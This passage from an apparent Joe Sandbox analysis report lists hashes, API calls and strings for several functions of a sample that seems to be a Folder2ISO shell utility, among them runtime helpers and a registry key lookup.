                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Path$CombineRelative
                  • String ID: PstTt
                  • API String ID: 2123060961-1890372139
                  • Opcode ID: 9804ce4cabc5ba9a6bbe64085ec6c63fadb780d87b3979a4f8ae64c9616eaacf
                  • Instruction ID: 890e8cd7ecff449cb06783a6fd3a1c0abf5aaa38d77ae7a594d5a9da71ae7674
                  • Opcode Fuzzy Hash: 9804ce4cabc5ba9a6bbe64085ec6c63fadb780d87b3979a4f8ae64c9616eaacf
                  • Instruction Fuzzy Hash: CD31D2315086359BC724EF54F8849BAB3EBEFAA700F14482EE846CB650E771DD41CB92
                  Function 0062EC4F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                  Download Yara Rule
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 0062EC99
                  • __EH_prolog3.LIBCMT ref: 0062ECA6
                    • Part of subcall function 0062EBC9: __EH_prolog3_catch.LIBCMT ref: 0062EBD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: H_prolog3H_prolog3_catchXinvalid_argumentstd::_
                  • String ID: vector<T> too long
                  • API String ID: 1050700602-3788999226
                  • Opcode ID: e8013a72156a9cde861499f75a172c57fca031f3db69e16be6d788384825b464
                  • Instruction ID: f848d4a9b9714daf46537ebbeca21d0be3e490d0073f49c79de4259a870a5a4b
                  • Opcode Fuzzy Hash: e8013a72156a9cde861499f75a172c57fca031f3db69e16be6d788384825b464
                  • Instruction Fuzzy Hash: B0212772700B218BCB28EF69E9D596EB7A7AF98310B10483EF55787741C631AD40CA58
                  Function 0062B75F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: H_prolog3
                  • String ID: 0020$HDMV
                  • API String ID: 431132790-2900241748
                  • Opcode ID: 65cf8cecfafe280488d42133f15be56c89e14da9fcfeceddbcf4ad63b477627d
                  • Instruction ID: 3ee7dc6411d780b52082f1fc42418372f1657d4a0dc7a0a3864ba2e61668e263
                  • Opcode Fuzzy Hash: 65cf8cecfafe280488d42133f15be56c89e14da9fcfeceddbcf4ad63b477627d
                  • Instruction Fuzzy Hash: A42166B5801F809ED3718F6AC500246FBF9BFA5714B108A1ED2E6C7AA0C7B1A508CF95
                  Function 00621605 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19registryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyW.ADVAPI32(80000001,Software\Classes\Folder\shell\Folder2ISO,?), ref: 00621617
                  • RegCloseKey.ADVAPI32(?,?,00000001,006218C9), ref: 00621624
                  Strings
                  • Software\Classes\Folder\shell\Folder2ISO, xrefs: 0062160D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CloseOpen
                  • String ID: Software\Classes\Folder\shell\Folder2ISO
                  • API String ID: 47109696-1743991603
                  • Opcode ID: 43e7fce75c971da53fad80d8f7b7417d3437229ffac34a86b86db1bf684c9dff
                  • Instruction ID: f22cf10d211857be078fb22ca7bf78f47cde836121d85fefc648d3ea314afdcb
                  • Opcode Fuzzy Hash: 43e7fce75c971da53fad80d8f7b7417d3437229ffac34a86b86db1bf684c9dff
                  • Instruction Fuzzy Hash: B1D0A731654109FFC710DBB0AD05EBE7BEFDB1AB09F6004A4BD0AD0010E6638A50FB62